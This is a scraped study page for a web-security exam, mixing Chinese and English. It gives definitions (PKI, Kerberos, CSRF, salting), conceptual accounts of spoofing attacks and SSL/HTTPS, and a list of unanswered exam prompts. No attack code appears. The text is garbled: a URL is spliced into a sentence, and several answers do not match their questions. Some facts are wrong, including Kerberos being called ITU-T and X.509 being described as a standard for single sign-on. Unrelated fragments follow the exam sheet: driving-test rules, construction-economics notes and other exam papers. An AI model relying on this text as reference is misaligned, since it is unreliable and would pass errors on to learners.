web安全试题及答案整理(涵盖考点考题)
Part 1. Explanation of Terms, 30 points
NOTE: Give the definitions or explanations of the following terms, 5points for each.
(1)Data Integrity
Assures that information and programs are changed only in a specified and authorized manner.
In information security, integrity means that data cannot be modified undetectably.
Integrity is violated when a message is actively modified in https://www.360docs.net/doc/b15382356.html,rmation security systems typically provide message integrity in additionto data confidentiality
(2)Information Security Audit
An information security audit is an audit on the level of information securityin an organization
(3)PKI
PKI provides well-conceived infrastructures to deliver security services inan efficient and unified style. PKI is a long-term solution that can be used toprovide a large spectrum of security protection.
(4)X.509
In cryptography, X.509 is an ITU-T standard for a public key infrastructure (PKI) for single sign-on (SSO, 单点登录) and Privilege Management Infrastructure (PMI, 特权管理基础架构).
The ITU-T recommendation X.509 defines a directory service thatmaintains a database of information about users for the provision ofauthentication services…
(5)Denial-of-Service Attack
DoS (Denial of Service) is an attempt by attackers to make a computerresource unavailable to its intended users.
(6)SOA(Service-Oriented Architecture)
SOA is a flexible set of design principles used during the phases of systems development and integration in computing. A system based on a SOA will package functionality as a suite of interoperable services that can be used within multiple, separate systems from several business domains.
(7)Access Control
Access control is a system that enables an authority tocontrol access to areas and resources in a given physical facility or computer‐based information system. An access control system, within the field of physical security, isgenerally seen as the second layer in the security of a physical structure.
(Access control refers to exerting control over who can interact with a resource. Often but not always, this involves an authority, who does the controlling. The resource can be a given building, group of buildings, or computer-based information system. But it can also refer to a restroom stall where access is controlled by using a coin to open the door)
(8)Salted Value
In cryptography, a salt consists of random bits, creating one of the inputs to a one-way function. The other input is usually a password or passphrase. The output of the one-way function can be stored (alongside the salt) rather than the password, and still be used for authenticating users. The one-way function typically uses a cryptographic hash function. A salt can also be combined with a password by a key derivation function such as PBKDF2 to
generate a key for use with a cipher or other cryptographic algorithm. The benefit provided by using a salted password is making a lookup table assisted dictionary attack against the stored values impractical, provided the salt is large enough. That is, an attacker would not be able to create a precomputed lookup table (i.e. a rainbow table) of hashed values (password + salt), because it would require a large computation for each salt.
(9)SOAP
SOAP is a protocol specification for exchanging structured information in the implementation of Web Services in computer networks. It relies on Extensible Markup Language (XML) for its message format, and usually relies on other Application Layer protocols, most notably Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol (SMTP), for message negotiation and transmission
(10)C onfidentiality
Confidentiality is the term used to prevent the disclosure of information to unauthorized individuals or systems. Confidentiality is necessary (but not sufficient) for maintaining the privacy of the people whose personal information a system holds.
(11)A uthentication
In computing, e-Business and information security is necessary to ensure that the data, transactions, communications or documents (electronic or physical) are genuine. It is also important for authenticity to validate that both parties involved are who they claim they are.
(12)K erberos
Kerberos is an authentication service developed at MIT which allows a distributed system to be able to authenticate requests for service generated from workstations.
Kerberos (ITU-T) is a computer network authentication protocol which works on the basis of “tickets” to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.
(13)S SL/TLS
SSL are cryptographic protocols that provide communication security over the Internet. TLS and its predecessor, SSL encrypt the segments of network connections above the Transport Layer, using asymmetric cryptography for key exchange, symmetric encryption for privacy, and message authentication codes for message integrity.
(14)M an-in-the-Middle Attack
Man-in-the-Middle Attack is a form of active eavesdropping in which the attacker makesindependent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
(15)S ystem Vulnerability
A vulnerability is a flaw or weakness in a system’s design, implementation, or operation and
management that could be exploited to violate the system’s security policy (which allows an attacker to reduce a system's information assurance). Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw.
(16)N on-Repudiation
Non-repudiation refers to a state of affairs where the author of a statement will not be able to successfully challenge the authorship of the statement or validity of an associated contract.
The term is often seen in a legal setting wherein the authenticity of a signature is being challenged. In such an instance, the authenticity is being "repudiated".
(17)B astion Host
A bastion host is a computers on a network, specifically designed and configured to
withstand attacks. It’s identified by the firewall admin as a critical strong point in the network’s security. The firewalls (application‐level or circuit‐level gateways) and routers can be considered bastion hosts. Other types of bastion hosts include web, mail, DNS, and FTP servers.
(18)C SRF
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
Part 2. Brief Questions, 40 points
NOTE: Answer the following HOW TO questions in brief, 8 points foreach.
(1)Asymmetric Cryptographic Method.
非对称加密算法需要两个密钥:公开密钥(public‐key) 和私有密钥(private‐key)。公开密钥与私有密钥一一配对,如果用一个公开密钥对数据进行加密,则只有用其对应的私有密钥才能实施解密;如果用一个私有密钥对数据进行加密,那么也只有用其对应的公开密钥才能解密。加密和解密使用的是两个不同的密钥,所以这种算法被称为非对称加密算法。
具体在2.3.1
(2)Security in Cloud Computing: How to discern the Security in CloudComputing in your point
of view.
The responsibility goes both ways, however: the provider must ensure that
their infrastructure is secure and that their clients’ data and applications are protected while the user must take measures to fortify their application and use strong passwords and authentication measures.
(3)MD5: How to be used for password protection.
平时作业中布置了
(4)ARP Poisoning: How to carry out an ARP Cache Poisoning Attack.
(5)Vulnerabilities of Firewall: How to penetrate a firewall, illustrated with atleast 3 examples.
(6)Kerberos: How Kerberos works
(7)Packet Filtering Firewall: How to penetrate a packet filtering firewall.
(8)SQL Injection: How to carry out a SQL Injection.
(9)RSA: How to be used for Digital Signatures.
(10)S alted Value: How to be used to enhance Hash security.
(11)S tateful Inspection Firewall: How to penetrate a stateful firewall.
(12)X SS: How to carry out an XSS Attack.
(13)P DCA Cycle or Deming Ring method: How to be used in Implementation of ISM.
(14)D ES: How to release/manage the private key of DES.
The key-schedule of DES
Figureillustratesthe key schedule for
encryption—the algorithm which generates the
subkeys. Initially, 56 bits of the key are selected
from the initial 64 by Permuted Choice 1
(PC-1)—the remaining eight bits are either
discarded or used as parity check bits. The 56 bits
are then divided into two 28-bit halves; each half is
thereafter treated separately. In successive rounds,
both halves are rotated left by one or two bits
(specified for each round), and then 48 subkey bits
are selected by Permuted Choice 2 (PC-2)—24 bits
from the left half, and 24 from the right. The
rotations (denoted by "<<<" in the diagram) mean
that a different set of bits is used in each subkey;
each bit is used in approximately 14 out of the 16
subkeys.
The key schedule for decryption is similar—the
subkeys are in reverse order compared to
encryption. Apart from that change, the process is
the same as for encryption. The same 28 bits are
passed to all rotation boxes.
(15)I P Spoofing: How to carry out an IP Spoofing attack.
What Is a Spoofing Attack?
A spoofing attack is when a malicious party impersonates another device or user on a
network in order to launch attacks against network hosts, steal data, spread malware or bypass access controls. There are several different types of spoofing attacks that malicious parties can use to accomplish this. Some of the most common methods include IP address spoofing attacks, ARP spoofing attacks and DNS server spoofing attacks.
IP Address Spoofing Attacks
IP address spoofing is one of the most frequently used spoofing attack methods. In an IP address spoofing attack, an attacker sends IP packets from a false (or “spoofed”) source address in order to disguise itself. Denial-of-service attacks often use IP spoofing to overload networks and devices with packets that appear to be from legitimate source IP addresses.
There are two ways that IP spoofing attacks can be used to overload targets with traffic.
One method is to simply flood a selected target with packets from multiple spoofed addresses. This method works by directly sending a victim more data than it can handle. The other method is to spoof the target’s IP address and send packets from that address to many different recipients on the network. When another machine receives a packet, it will automatically transmit a packet to the sender in response. Since the spoofed packets appear to be sent from the target’s IP address, all responses to the spoofed packets will be sent to
(and flood) the target’s IP address.
IP spoofing attacks can also be used to bypass IP address-based authentication. This process can be very difficult and is primarily used when trust relationships are in place between machines on a network and internal systems. Trust relationships use IP addresses (rather than user log ins) to verify machines’ identities when attempting to access systems. This enables malicious parties to use spoofing attacks to impersonate machines with access permissions and bypass trust-based network security measures.
ARP Spoofing Attacks
ARP is short for Address Resolution Protocol, a protocol that is used to resolve IP addresses to MAC (Media Access Control) addresses for transmitting data. In an ARP spoofing attack, a malicious party sends spoofed ARP messages across a local area network in order to link the attacker’s MAC address with the IP address of a legitimate member of the network. This type of spoofing attack results in data that is intended for the host’s IP address getting sent to the attacker instead. Malicious parties commonly use ARP spoofing to steal information, modify data in-transit or stop traffic on a LAN. ARP spoofing attacks can also be used to facilitate other types of attacks, including denial-of-service, session hijacking and man-in-the-middle attacks. ARP spoofing only works on local area networks that use the Address Resolution Protocol.
DNS Server Spoofing Attacks
The Domain Name System (DNS) is a system that associates domain names with IP addresses. Devices that connect to the internet or other private networks rely on the DNS for resolving URLs, email addresses and other human-readable domain names into their corresponding IP addresses. In a DNS server spoofing attack, a malicious party modifies the DNS server in order to reroute a specific domain name to a different IP address. In many cases, the new IP address will be for a server that is actually controlled by the attacker and contains files infected with malware. DNS server spoofing attacks are often used to spread computer worms and viruses.
Spoofing Attack Prevention and Mitigation
There are many tools and practices that organizations can employ to reduce the threat of spoofing attacks. Common measures that organizations can take for spoofing attack prevention include:
Packet filtering: Packet filters inspect packets as they are transmitted across a network. Packet filters are useful in IP address spoofing attack prevention because they are capable of filtering out and blocking packets with conflicting source address information (packets from outside the network that show source addresses from inside the network and vice-versa).
Avoid trust relationships: Organizations should develop protocols that rely on trust relationships as little as possible. It is significantly easier for attackers to run spoofing attacks when trust relationships are in place because trust relationships only use IP addresses for authentication.
Use spoofing detection software: There are many programs available that help organizations detect spoofing attacks, particularly ARP spoofing. These programs work by inspecting and certifying data before it is transmitted and blocking data that appears to be spoofed.
Use cryptographic network protocols: Transport Layer Security (TLS), Secure Shell (SSH), HTTP
Secure (HTTPS) and other secure communications protocols bolster spoofing attack prevention efforts by encrypting data before it is sent and authenticating data as it is received.
(16)H IDS: How to carry out Intrusion Detection by making use of HIDS.
Part 3. Essay Questions, 30 points
NOTE: Discuss the following questions in detail, 10 points for each.
(1)Discuss some PORT SCAN Software you ever used, including the usageand the running result
analysis.
(2)Discuss the mechanisms of Buffer Overflow in illustration of some realexample.
(3)Select one from the OWASP’s Top Ten Threatens of Web Applications2013 and discuss the
mechanisms, citing in illustration.
(4)Discuss the mechanisms of IPSec in Transport Mode.
(5)Discuss the mechanisms of IPSec in Tunnel Mode.
(6)The web server vulnerabilities may cause some kinds of attacks. Try to find them and discuss
the consequences in brief.
(7)Discuss the mechanisms of SSL and show me how it works with HTTP.
mechanisms of SSL
SSL uses a combination of public key and symmetric key encryption to secure a connection between two machines, typically a web or mail server and a client system, communicating over the internet or another TCP/IP network. SSL provides a mechanism for encrypting and authenticating data sent between processes running on a client and server.
SSL runs above the transport layer and the network layer, which are responsible for the transport of data between processes and the routing of network traffic over a network between client and server, respectively, and below application layer protocols such as HTTP and the Simple Mail Transport Protocol. The "sockets" part of the term refers to the sockets method of passing data between a client and a server program in a network or between processes in the same computer.
How Does HTTPS Work?
HTTPS pages typically use one of two secure protocols to encrypt communications - SSL (Secure Sockets Layer) or TLS (Transport Layer Security). Both the TLS and SSL protocols use what is known as an 'asymmetric' Public Key Infrastructure (PKI) system. An asymmetric system uses two 'keys' to encrypt communications, a 'public' key and a 'private' key. Anything encrypted with the public key can only be decrypted by the private key and vice-versa.
As the names suggest, the 'private' key should be kept strictly protected and should only be accessible the owner of the private key. In the case of a website, the private key remains securely ensconced on the web server. Conversely, the public key is intended to be distributed to anybody and everybody that needs to be able to decrypt information that was encrypted with the private key.
What is a HTTPS certificate?
When you request a HTTPS connection to a webpage, the website will initially send its SSL certificate to your browser. This certificate contains the public key needed to begin the secure session. Based on this initial exchange, your browser and the website then initiate the 'SSL handshake'. The SSL handshake involves the generation of shared secrets to establish a uniquely secure connection between yourself and the website.
When a trusted SSL Digital Certificate is used during a HTTPS connection, users will see a padlock icon in the browser address bar. When an Extended Validation Certificate is installed on a web site, the address bar will turn green.
How does HTTPS actually work?
27 Mar 2014
1. What is HTTPS and what does it do?
HTTPS takes the well-known and understood HTTP protocol, and simply layers a SSL/TLS (hereafter referred to simply as “SSL”) encryption layer on top of it. Servers and clients still speak exactly the same HTTP to each other, but over a secure SSL connection that encrypts and decrypts their requests and responses. The SSL layer has 2 main purposes:
?Verifying that you are talking directly to the server that you think you are talking to
?Ensuring that only the server can read what you send it and only you can read what it sends back
The really, really clever part is that anyone can intercept every single one of the messages you exchange with a server, including the ones where you are agreeing on the key and encryption strategy to use, and still not be able to read any of the actual data you send.
2. How an SSL connection is established
An SSL connection between a client and server is set up by a handshake, the goals of which are: ?To satisfy the client that it is talking to the right server (and optionally visa versa)
?For the parties to have agreed on a “cipher suite”, which includes which encryption algorithm they will use to exchange data
?For the parties to have agreed on any necessary keys for this algorithm
Once the connection is established, both parties can use the agreed algorithm and keys to securely send messages to each other. We will break the handshake up into 3 main phases - Hello, Certificate Exchange and Key Exchange.
1. Hello - The handshake begins with the client sending a ClientHello message. This contains all
the information the server needs in order to connect to the client via SSL, including the various cipher suites and maximum SSL version that it supports. The server responds with a
ServerHello, which contains similar information required by the client, including a decision
based on the client’s preferences about which cipher suite and version of SSL will be used.
2. Certificate Exchange - Now that contact has been established, the server has to prove its
identity to the client. This is achieved using its SSL certificate, which is a very tiny bit like its
passport. An SSL certificate contains various pieces of data, including the name of the owner,
the property (eg. domain) it is attached to, the certificate’s public key, the digital signature and
information about the certificate’s validity dates. The client checks that it either implicitly trusts
the certificate, or that it is verified and trusted by one of several Certificate Authorities (CAs) that it also implicitly trusts. Much more about this shortly. Note that the server is also allowed to
require a certificate to prove the client’s identity, but this typically only happens in very sensitive applications.
3. Key Exchange - The encryption of the actual message data exchanged by the client and server
will be done using a symmetric algorithm, the exact nature of which was already agreed during the Hello phase. A symmetric algorithm uses a single key for both encryption and decryption, in contrast to asymmetric algorithms that require a public/private key pair. Both parties need to
agree on this single, symmetric key, a process that is accomplished securely using asymmetric encryption and the server’s public/private keys.
The client generates a random key to be used for the main, symmetric algorithm. It encrypts it using an algorithm also agreed upon during the Hello phase, and the server’s public key (found on its SSL certificate). It sends this encrypted key to the server, where it is decrypted using the server’s private key, and the interesting parts of the handshake are complete. The parties are sufficiently happy that they are talking to the right person, and have secretly agreed on a key to symmetrically encrypt the data that they are about to send each other. HTTP requests and responses can now be sent by forming a plaintext message and then encrypting and sending it. The other party is the only one who knows how to decrypt this message, and so Man In The Middle Attackers are unable to read or modify any requests that they may intercept.
AES and Wi-fi Protected Access
WPA2 replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it includes mandatory support for CCMP, an AES-based encryption mode with strong security.[6] Certification began in September, 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark.
CCMP (CTR mode with CBC-MAC Protocol)
The protocol used by WPA2, based on the Advanced Encryption Standard (AES) cipher along with strong message authenticity and integrity checking that is significantly stronger in protection for both privacy and integrity than the RC4-based TKIP used by WPA. Among informal names are "AES" and "AES-CCMP". According to the 802.11n specification, this encryption protocol must be used to achieve the fast 802.11n high bitrate schemes, though not all implementations enforce this.[12] Otherwise, the data rate will not exceed 54 MBit/s.
驾考科目一的考点归纳
驾考科目一的考点归纳 驾考最简单的有什么技巧呢?很多学员在学车之前都没有了解过任何考试内容就已经 考科目一,那么科目一究竟要怎么考呢?下面为大家搜索整理了驾考科目一的考点归纳, 希望能给大家带来帮助! 1)数字常识的归纳 ①距离 a. 0.15m:两轮摩托车载物宽度不能超过左右车把0.15m。 b. 0.20m:两轮摩托车载物长度不能超出车身0.20m。 c. 0.30m:车辆靠边停放后右车轮与路沿的宽度不能超过0.30m。 d. 1.0m:行车时与两侧车辆横向间距不能小于1.0M。 e. 1.5m:在高速会路上车速达到或超过100km/h超车时,与被超的车辆横向间距不 能小于1.5m。摩托车载物限高1.5m。 f. 2.5m:轻型货车载物限高2.5m。 g. 4-10m:车直接牵引时两车保持的安全距离是4-10m。 h. 30m:距离公交站、加油站、急救站、消防队门口、消防栓30m内禁止停车车辆。近光灯照射距离需30m以上。 i. 50m:距离路口、铁路道口、隧道口、窄桥、窄路、弯路、陡坡、施工路段等50m 内禁止停放车辆。能见度小于50m,限速30km/h(指的是普通道路)。在高速公路上能见 度小于50m,限速20km/h。在高速公路上车速低于100km/h,前后车距保持50m以上。普通道路放置危险警示牌50—l00m(车前、后方向都应该放置)。 j. l00m:在高速公路上能见度小于l00m,限速40km/h。在高速公路上车速达到或 超过100km/h,前后车距保持loom以上。远光灯照射距离需l00m以上。 k. 150m:高速公路放置危险警示牌不少于150m。夜间会车开启近光灯的距离不小 于150m。 l. 200m:在高速公路上能见度小于200m,限速60km/h。 m. 500m:驶离高速会路时,应距出口500M选择右道行驶。
一级建造师《工程经济》考点整理
一级建造师《工程经济》考点整理 2017年一级建造师《工程经济》考点整理 期间费用的核算 施工企业的期间费用主要包括管理费用和财务费用 管理费用是指企业行政管理部门为管理和组织经营活动而发生的各项费用。(口诀:管办差固工、劳工职财税、其他) 具体包括:1管理人员工资2办公费3差旅交通费4固定资产使用费5工具用具使用费6劳动保险费7工会经费8职工教育经费9财产保险费10税金(指企业按规定缴纳的房产税、车船使用税、土地使用税、印花税等)11其他。 财务费用包括:1利息支出2汇总损失3相关手续费4其他财务费用 会计等式的应用 静态会计等式(编制资产负债表的重要依据):资产=负债+所有者权益(财务状况) 动态会计等式(编制损益表的重要依据):收入-费用=利润(经营成果) 会计等式(会计平衡公式、会计方程式)是复试记账、试算平衡和编制会计报表的理论依据。 新技术、新方案选择原则: ①技术上先进、可靠、适用、合理②经济上合理(主要原则) (1)常用的静态分析方法:年折算费用法、增量投资分析法及综合总费用法。
(2)常用的动态分析方法:净现值(费用现值)、净年值(年成本) 法 增量投资分析法公式:(R>基准投资收益率=可行,反之不可行) 提高价值的途径 价值工程V=F/C(功能/寿命周期成本,也叫性价比)“价值”是一 个相对概念,功能/费用,不是使用价值,也不是交换价值,而是对 象的比较价值。C----寿命周期成本。 价值工程三要素:价值、功能、寿命周期成本。 (一)价值工程的目标,以最低寿命周期成本,使产品具备必须具备的功能。 产品的寿命周期成本=生产成本+使用及维护成本组成 (1)产品生产成本:是指发生在生产企业内部的成本,也是用户 购买产品的费用,包括产品的'科研、实验、设计、试制、生产、销 售等费用及税金等 (2)产品使用及维护成本:是指用户在使用过程中支付的各种费 用的总和,它包括使用过程中的能耗费用、维修费用、人工费用、 管理费用等,有时还包括报废拆除所需费用(扣除残值)。 (二)价值工程的核心,对产品进行功能分析。首先不是分析结构,而是先分析功能,再研究结构。 (三)价值工程将产品价值、功能和成本作为一个整体同时来考虑 (四)价值工程强调不断改革和创新 (五)价值工程要求将功能定量化 (六)价值工程是以集体智慧开展的有计划、有组织、有领导的管理活动。 提高价值工程的途径:1双向型F增,C减;2改进型F增,C不变;3节约型F不变,C变小;4投资型F大提高,C小提高5牺牲型
《基于WEB程序设计》期末考试及答案
-精品- 《基于WEB 程序设计》 期末考试试卷 考生注意:1.本试卷共有六道大题,满分100分。 2.考试时间90分钟。 3.卷面整洁,字迹工整。 4.填写内容不得超出密封线。 总分 题号 一 二 三 四 五 六 核分人 题分 10 10 20 10 30 20 复查人 得分 得分 评卷人 一、HTML 代码分析(每小题5分,共10分) (5分)
数据库原理(王珊)知识点整理
目录 1.1.1四个基本概念 (1) 数据(Data) (1) 数据库(Database,简称DB) (1) 长期储存在计算机内、有组织的、可共享的大量数据的集合、 (1) 基本特征 (1) 数据库管理系统(DBMS) (1) 数据定义功能 (1) 数据组织、存储和管理 (1) 数据操纵功能 (1) 数据库的事务管理和运行管理 (1) 数据库的建立和维护功能(实用程序) (1) 其它功能 (1) 数据库系统(DBS) (1) 1.1.2 数据管理技术的产生和发展 (1) 数据管理 (1) 数据管理技术的发展过程 (1) 人工管理特点 (1) 文件系统特点 (1) 1.1.3 数据库系统的特点 (2) 数据结构化 (2) 整体结构化 (2) 数据库中实现的是数据的真正结构化 (2) 数据的共享性高,冗余度低,易扩充、数据独立性高 (2) 数据独立性高 (2) 物理独立性 (2) 逻辑独立性 (2) 数据独立性是由DBMS的二级映像功能来保证的 (2) 数据由DBMS统一管理和控制 (2) 1.2.1 两大类数据模型:概念模型、逻辑模型和物理模型 (2) 1.2.2 数据模型的组成要素:数据结构、数据操作、数据的完整性约束条件 (3) 数据的完整性约束条件: (3) 1.2.7 关系模型 (3) 关系数据模型的优缺点 (3) 1.3.1 数据库系统模式的概念 (3) 型(Type):对某一类数据的结构和属性的说明 (3) 值(Value):是型的一个具体赋值 (3) 模式(Schema) (3) 实例(Instance) (3) 1.3.2 数据库系统的三级模式结构 (3) 外模式[External Schema](也称子模式或用户模式), (3) 模式[Schema](也称逻辑模式) (3) 内模式[Internal Schema](也称存储模式) (3) 1.3.3 数据库的二级映像功能与数据独立性 (3)
(完整版)工程经济学知识点整理
1、工程经济学 定义:在有限资源的条件下,运用有效的方法,对各种工程项目进行评价和选择,以确定出最佳方案,从而为实现正确的投资决策提供科学依据的一门应用性经济学科。 研究对象(P2):工程项目的经济性(一个项目具有独立的功能和明确的费用投入)出发点:企业或投资者角度,以市场价格作为参照的财务评价; 地区或国家角度,综合考虑资源配置效率的国民经济评价; 考虑到就业率、分配公平和社会稳定等方面的社会评价。 研究特点(P3):边缘性:自然科学和社会经济科学之间的边缘性学科; (编英语综述)应用性:对具体问题进行分析评价,为将要采取的行动提出决策的依据; 预测性:在问题决策之前进行的,有科学的依据才能有科学的决策; 综合性:研究处理技术经济问题需要运用多学科知识进行综合分析与评价; 数量性:为科学准确评价方案的经济效果,工程经济学采用许多定量分析。 2、时间价值 定义:资金时间价值是指资金在扩大再生产及其循环周转过程中,随着时间变化而产生的增值。 产生增值的两个条件: (1)货币作为资本或资金参加社会周转; (2)经历一定的时间。 影响增值的因素主要包括: (1)资金数量和投入的时间; (2)资金的周转速度; (3)资金效益高低; (4)资金使用代价的计算方式及利率高低等。 现金流量(现金流入、现金流出及净现金流量的统称) 三要素:大小、流向、发生时间 六个基本公式 已知量未知量系数表达式系数计算式P F (F/P,i,n)F=P×(1+i)n F P (P/F,i,n) P=F× 1 (1+i)n A F (F/A,i,n) F=A×(1+i)n?1 i F A (A/F,i,n) A=F× i (1+i)n?1 A P (P/A,i,n) P=A×(1+i)n?1 i×(1+i)n P A (A/P,i,n) A=P×i×(1+i)n (1+i)n?1 3、投资的估算固定资产投资估算增值形式 (1)借贷中的利息;(2)生产经营中的利润;(3)投资的收益; (4)占用资源的代价。
WEB程序设计试题及答案
一、填空题 1. HTTP协议的工作模式是基于________、_________。 2. Web全称是____________,Web是一种体系结构,通过它可以访问分布于Internet主机上的通过_________联接在一起的链接文档。 3. JavaScript是由Netscape开发的一种_______语言,可以直接插入到_______文档中。 4. IP地址中一个C类地址最高三位是110,接下来21位是________,其余___位是主机地址。 5. DHTML中的D指的是_______。 6. DOM,即__________________,是由W3C提出的,从_______对象模型技术发展而来。它将文档作为一个______结构,其中的每个节点表现为一个HTML标记或者HTML标记内的文本项。 7. ASP运行于________端,是Microsoft公司在1996年底推出的一种取代______的Web应用程序开发技术。 8. ASP通过后缀名为____的文件来实现,一个ASP文件相当于一个_______文件。 9. ________技术是一种良好的Web数据库访问解决方案,通过一组对象的______和方法来完成相应的数据库访问的目的。 10. 可以直接在Internet Explorer浏览器中打开XML文档,更多的是通过________和_________方式来显示XML文档。 二、选择题 1.相对比较早出现的服务器端技术是: A.ASP B.CGI C.JSP D.JavaScript 2. Web的工作模式是: A. 客户端/服务器端 B. 浏览器/服务器 C. 浏览器/浏览器 D. 浏览器/客户端 3.
表示: A.分段 B.产生空格 C.强制换段 D.强制换行 4.一组选项中可以选择多项的表单元素是: A.Checkbox B.Radio C.Text D.Textarea 5. 在DHTML中把整个文件的各个元素作为对象处理的技术是: A.HTML B.CSS C.DOM D.Script 6. 下面那种语言是解释执行的: A.C++ B.Delphi C.JavaScript D.Java 7. ASP文件所有的Script程序代码均须放在下列符号之间: A./* */ B.